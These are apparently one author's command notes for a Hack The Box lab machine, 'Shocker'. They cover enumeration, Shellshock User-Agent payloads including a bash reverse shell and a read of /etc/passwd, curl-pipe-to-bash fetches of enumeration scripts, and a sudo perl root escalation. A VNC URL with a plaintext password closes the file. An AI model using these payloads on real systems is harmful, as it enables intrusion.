########################################################################
Prep
########################################################################

sudo vim /usr/share/nmap/scripts/http-shellshock.nse
comment out line 100

Firefox:
about:config
network.captive-portal-service.enabled

cd ~
mkdir shocker
cd shocker

########################################################################
Start
########################################################################

sudo nmap -Pn -sV -sS -oA shocker-init 10.10.10.56
cat shocker-init

sudo nmap -Pn -sV -sS -A -p- -T5 -vv --script vuln -O -oA shocker-full 10.10.10.56
cat shocker-full


ffuf -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.56/FUZZ

ffuf -w /usr/share/dirb/wordlists/big.txt -e .sh -u http://10.10.10.56/cgi-bin/FUZZ



sudo nmap -Pn -sS -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56 -oA shocker-script
cat shocker-script


http://10.10.10.56/cgi-bin/user.sh





User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'


sudo tcpdump -i tun0 icmp

User-Agent: () { :;}; echo; /bin/bash -c 'ping 10.10.14.24 -c 4'


nc -lvnp 1234

User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/10.10.14.24/1234 0>&1




python3 -c "import pty;pty.spawn('/bin/bash')"

cd ~/htb/enum
./start-pythonwebserver.sh

sudo python3 -m http.server 8888

curl http://10.10.14.24:8888/LinEnum.sh | bash

curl http://10.10.14.24:8888/linpeas.sh | bash



sudo -l

sudo perl -e 'system ("/bin/bash")'

id

cat /root/root.txt



https://vnc.htb-cloud.com/index.html?host=proxy-de.htb-cloud.com%2Fbird%2Fhtb-nfvqowfxtw.htb-cloud.com&password=Y4DtyoK9&view_only=true
